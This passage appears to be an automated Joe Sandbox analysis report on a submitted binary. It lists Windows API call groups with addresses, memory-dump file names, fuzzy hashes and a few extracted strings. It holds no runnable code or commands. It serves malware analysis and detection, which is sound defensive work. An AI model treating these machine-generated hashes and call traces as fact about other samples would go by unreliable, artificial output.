                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                              • String ID:
                                              • API String ID: 2108273632-0
                                              • Opcode ID: 3cd9800362e2103502aecf467b49524db2178ab00db565447d3ac55ba0874f3e
                                              • Instruction ID: 4f3a5cf0ff737c61717842a8d09321f3b057436a63a8f742dbd5095e2103e396
                                              • Opcode Fuzzy Hash: 3cd9800362e2103502aecf467b49524db2178ab00db565447d3ac55ba0874f3e
                                              • Instruction Fuzzy Hash: 5E31E231A02602AFDF269FB1CD86FB77BACEB01300F114179E821D71A1E735A885DB60
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00398A30
                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00398ADA
                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00398AE2
                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00398AF0
                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00398AF8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              • Opcode ID: b3b4c9a8baf76d25d08d469182736da4854758c5db0ecfb3be19ca2de82e8c4e
                                              • Instruction ID: 9e945881b265b744a906a0e4bd945e59ab424563adafa256a7f6cb4147398d81
                                              • Opcode Fuzzy Hash: b3b4c9a8baf76d25d08d469182736da4854758c5db0ecfb3be19ca2de82e8c4e
                                              • Instruction Fuzzy Hash: 7E31E071500219EFDF15CFA8DD4CA9E7BB9EB45315F11822AF925EB2D0C7B09910DB90
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 0039B204
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0039B221
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0039B259
                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0039B27F
                                              • _wcsstr.LIBCMT ref: 0039B289
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                              • String ID:
                                              • API String ID: 3902887630-0
                                              • Opcode ID: 3dc8c7931b56c18c0ac2c72bbcb5ec98a2fe6591f068daa6022a13fd8a229eb7
                                              • Instruction ID: ab19c3605d9d19b57e85c2bb9951442d53201c30377acd4a29b5b487c33514a6
                                              • Opcode Fuzzy Hash: 3dc8c7931b56c18c0ac2c72bbcb5ec98a2fe6591f068daa6022a13fd8a229eb7
                                              • Instruction Fuzzy Hash: F221D332204200AAEB165B79AD49E7FBBADDB49710F018529F845DA1A1EB61DC409760
                                              APIs
                                                • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                              • GetWindowLongW.USER32(?,000000F0), ref: 003CB192
                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003CB1B7
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003CB1CF
                                              • GetSystemMetrics.USER32(00000004), ref: 003CB1F8
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,003B0E90,00000000), ref: 003CB216
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$Long$MetricsSystem
                                              • String ID:
                                              • API String ID: 2294984445-0
                                              • Opcode ID: f444a4009958933d5d4fea5daf5092e16a2dcc8fc475d643a90494cdebb37781
                                              • Instruction ID: 7b2970c11407761a5cf081a8d5b898fdb59bb417ef9081fcdf094ddd9c8f165e
                                              • Opcode Fuzzy Hash: f444a4009958933d5d4fea5daf5092e16a2dcc8fc475d643a90494cdebb37781
                                              • Instruction Fuzzy Hash: 44216071910655AFCB12AF38DC15F6ABBA9EB05361F164B39BD22D71E0D7309C209B90
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00399320
                                                • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00399352
                                              • __itow.LIBCMT ref: 0039936A
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00399392
                                              • __itow.LIBCMT ref: 003993A3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow$_memmove
                                              • String ID:
                                              • API String ID: 2983881199-0
                                              • Opcode ID: 8b8c6067b82ef104a21574d4b9b411f838a406a4c0f97f6346070b4a0a96fd79
                                              • Instruction ID: 03263dd0565fd4796ea3754df75906b140acad81e2fbb5591d82ed483bb697d2
                                              • Opcode Fuzzy Hash: 8b8c6067b82ef104a21574d4b9b411f838a406a4c0f97f6346070b4a0a96fd79
                                              • Instruction Fuzzy Hash: A121B335700208ABDF13AE698CC5FAE7BADEB49710F04402AF905DB2D1D6B09D559791
                                              APIs
                                              • IsWindow.USER32(00000000), ref: 003B5A6E
                                              • GetForegroundWindow.USER32 ref: 003B5A85
                                              • GetDC.USER32(00000000), ref: 003B5AC1
                                              • GetPixel.GDI32(00000000,?,00000003), ref: 003B5ACD
                                              • ReleaseDC.USER32(00000000,00000003), ref: 003B5B08
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$ForegroundPixelRelease
                                              • String ID:
                                              • API String ID: 4156661090-0
                                              • Opcode ID: 1dd7dc0d1cfcca7e63034143b46ebbceb043a0d1bc9cc84ebaa8595b182f2234
                                              • Instruction ID: ea2e48574e4b92ec645070bf53583cf9bbd625e99c43f505071d7ff05803bdc7
                                              • Opcode Fuzzy Hash: 1dd7dc0d1cfcca7e63034143b46ebbceb043a0d1bc9cc84ebaa8595b182f2234
                                              • Instruction Fuzzy Hash: 19216F75A00104AFD715EF65D884A9ABBE9EF48350F148479F949DB762DA70BD00CB90
                                              APIs
                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0034134D
                                              • SelectObject.GDI32(?,00000000), ref: 0034135C
                                              • BeginPath.GDI32(?), ref: 00341373
                                              • SelectObject.GDI32(?,00000000), ref: 0034139C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: d83611a286c5ece82ed0bc95bd76c4d1be058487a635785bd694ed79b19b325a
                                              • Instruction ID: d46698a71eba155f697b203f4ec51d9b4942b4f79c93a7cd227ca79e169a4829
                                              • Opcode Fuzzy Hash: d83611a286c5ece82ed0bc95bd76c4d1be058487a635785bd694ed79b19b325a
                                              • Instruction Fuzzy Hash: FB218631800A08DFDB12AF25DE08B6A7BE9FB00751F148225FC14AA5B0D370A9A1DF54
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 003A4ABA
                                              • __beginthreadex.LIBCMT ref: 003A4AD8
                                              • MessageBoxW.USER32(?,?,?,?), ref: 003A4AED
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003A4B03
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003A4B0A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                              • String ID:
                                              • API String ID: 3824534824-0
                                              • Opcode ID: 8cf44d40f38c20a74a444d958afb33be5efa3b8eefb0b3549dedf17e81b45966
                                              • Instruction ID: a14bba0dcfcc31dff3d4b2fa81e3f5591caeacb350cdbeb6b29ece34108bf84d
                                              • Opcode Fuzzy Hash: 8cf44d40f38c20a74a444d958afb33be5efa3b8eefb0b3549dedf17e81b45966
                                              • Instruction Fuzzy Hash: 6C110876904614BFD7029FA89C04E9B7FADEB86320F144269F814D3250D6B1D9008BB0
                                              APIs
                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0039821E
                                              • GetLastError.KERNEL32(?,00397CE2,?,?,?), ref: 00398228
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00397CE2,?,?,?), ref: 00398237
                                              • HeapAlloc.KERNEL32(00000000,?,00397CE2,?,?,?), ref: 0039823E
                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00398255
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 842720411-0
                                              • Opcode ID: 8ff524e1305342c2e4c756e202f39315497a16cf1657b97760c32a9fe1707dbf
                                              • Instruction ID: 4fbbc4a9ab03628de7c6c863c94d27809fb735506c6a208a8a62b313157b0e09
                                              • Opcode Fuzzy Hash: 8ff524e1305342c2e4c756e202f39315497a16cf1657b97760c32a9fe1707dbf
                                              • Instruction Fuzzy Hash: E1016971201604BFDF225FA6DC48D6B7FAEEF8A754B50082AF849C3220DA31AC10DB60
                                              APIs
                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?,?,00397455), ref: 00397127
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?), ref: 00397142
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?), ref: 00397150
                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?), ref: 00397160
                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?), ref: 0039716C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: 1ca06f4788235c48a8852f43f9d6172c705cb6f57c40417d2518b63e31c62ca8
                                              • Instruction ID: fe9fba931073874edbd7a800db87ad2db44d61f55fbecb75d66a1f4d06430689
                                              • Opcode Fuzzy Hash: 1ca06f4788235c48a8852f43f9d6172c705cb6f57c40417d2518b63e31c62ca8
                                              • Instruction Fuzzy Hash: 05017C76621204BFDB124F68DC44EAA7BAEEB44791F150064FD08D2260D731ED419BA0
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5260
                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003A526E
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5276
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003A5280
                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A52BC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: 179873f0531f03909182b92b0bfcac090c09237fa67fb35c4875e77afc804a3c
                                              • Instruction ID: a6b5b4bc975f417a13b03e5523ad343cc3ca62b7a166b107763a3f71aa11e585
                                              • Opcode Fuzzy Hash: 179873f0531f03909182b92b0bfcac090c09237fa67fb35c4875e77afc804a3c
                                              • Instruction Fuzzy Hash: 93015731D01A19DBCF02EFE4E848AEDBB7CFB0A311F460956E941F2140CB3065508BA1
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00398121
                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0039812B
                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0039813A
                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00398141
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00398157
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: 600764ac2f6f0cc5394f1faed5157ea3a9103a6fb602a7b5aa6feb589ded17cb
                                              • Instruction ID: 738d03bc0634a3d8a8ed229feedd446f793dfd6d2d3a6345f712e23f9509e6ce
                                              • Opcode Fuzzy Hash: 600764ac2f6f0cc5394f1faed5157ea3a9103a6fb602a7b5aa6feb589ded17cb
                                              • Instruction Fuzzy Hash: DCF06275200314BFEB121FA5EC88E6B3BADFF8AB54F040025F945C6150CB61ED41DB60
                                              APIs
                                              • GetDlgItem.USER32(?,000003E9), ref: 0039C1F7
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0039C20E
                                              • MessageBeep.USER32(00000000), ref: 0039C226
                                              • KillTimer.USER32(?,0000040A), ref: 0039C242
                                              • EndDialog.USER32(?,00000001), ref: 0039C25C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                              • String ID:
                                              • API String ID: 3741023627-0
                                              • Opcode ID: b98d067d0e5f44269bbc8bec68de00d54677d0939999d1dca9492153716b29ed
                                              • Instruction ID: e1288944d4b030b72e4516487e9ec78eab9365ea2e9d62168db653b80c5fafa9
                                              • Opcode Fuzzy Hash: b98d067d0e5f44269bbc8bec68de00d54677d0939999d1dca9492153716b29ed
                                              • Instruction Fuzzy Hash: C101A230414308ABEF266B60ED4EF9677BDFB00B06F004669A5C2E14E1DBF0B9549B90
                                              APIs
                                              • EndPath.GDI32(?), ref: 003413BF
                                              • StrokeAndFillPath.GDI32(?,?,0037B888,00000000,?), ref: 003413DB
                                              • SelectObject.GDI32(?,00000000), ref: 003413EE
                                              • DeleteObject.GDI32 ref: 00341401
                                              • StrokePath.GDI32(?), ref: 0034141C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                              • String ID:
                                              • API String ID: 2625713937-0
                                              • Opcode ID: f6cdc51a23f07ec54f880bcfa7635a89300a0c475115341f62003844a15ece43
                                              • Instruction ID: 9fa4076c9fb10f4e1b52a0d9d84e3cfff85b1172530a11dc5a91da709528c34b
                                              • Opcode Fuzzy Hash: f6cdc51a23f07ec54f880bcfa7635a89300a0c475115341f62003844a15ece43
                                              • Instruction Fuzzy Hash: CCF0FB31000B089FDB126F66ED4CB593BE9E700726F08C234E869981B1C73069A5DF14
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 003AC432
                                              • CoCreateInstance.OLE32(003D2D6C,00000000,00000001,003D2BDC,?), ref: 003AC44A
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                              • CoUninitialize.OLE32 ref: 003AC6B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                              • String ID: .lnk
                                              • API String ID: 2683427295-24824748
                                              • Opcode ID: 329f26b619709689e1a0f427d7fd0503e8ed7a0302262d77afc260c2e3be857c
                                              • Instruction ID: 357769e8a84e4e9839a11db91c9ff3d566a57d18de781722cfcb7047cfe0fac6
                                              • Opcode Fuzzy Hash: 329f26b619709689e1a0f427d7fd0503e8ed7a0302262d77afc260c2e3be857c
                                              • Instruction Fuzzy Hash: 83A12971104205AFD701EF54C881EAFB7E8EF99354F00492DF1569F1A2EB71EA49CB62
                                              APIs
                                                • Part of subcall function 00360DB6: std::exception::exception.LIBCMT ref: 00360DEC
                                                • Part of subcall function 00360DB6: __CxxThrowException@8.LIBCMT ref: 00360E01
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                • Part of subcall function 00347A51: _memmove.LIBCMT ref: 00347AAB
                                              • __swprintf.LIBCMT ref: 00352ECD
                                              Strings
                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00352D66
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                              • API String ID: 1943609520-557222456
                                              • Opcode ID: 8c22e9e825c3d99657e00037da70c1b1a9167f081e36d4a7fa39453e8676366b
                                              • Instruction ID: 9fb74108f67fe48ff5fd323689e2355bbcd54214f6d79f17cdf8bdbdc81f3c5d
                                              • Opcode Fuzzy Hash: 8c22e9e825c3d99657e00037da70c1b1a9167f081e36d4a7fa39453e8676366b
                                              • Instruction Fuzzy Hash: F49137715082019BC716EF24C896D6BB7E8AF96710F01495EF8859F2A2EB20ED48CB52
                                              APIs
                                                • Part of subcall function 00344750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00344743,?,?,003437AE,?), ref: 00344770
                                              • CoInitialize.OLE32(00000000), ref: 003AB9BB
                                              • CoCreateInstance.OLE32(003D2D6C,00000000,00000001,003D2BDC,?), ref: 003AB9D4
                                              • CoUninitialize.OLE32 ref: 003AB9F1
                                                • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
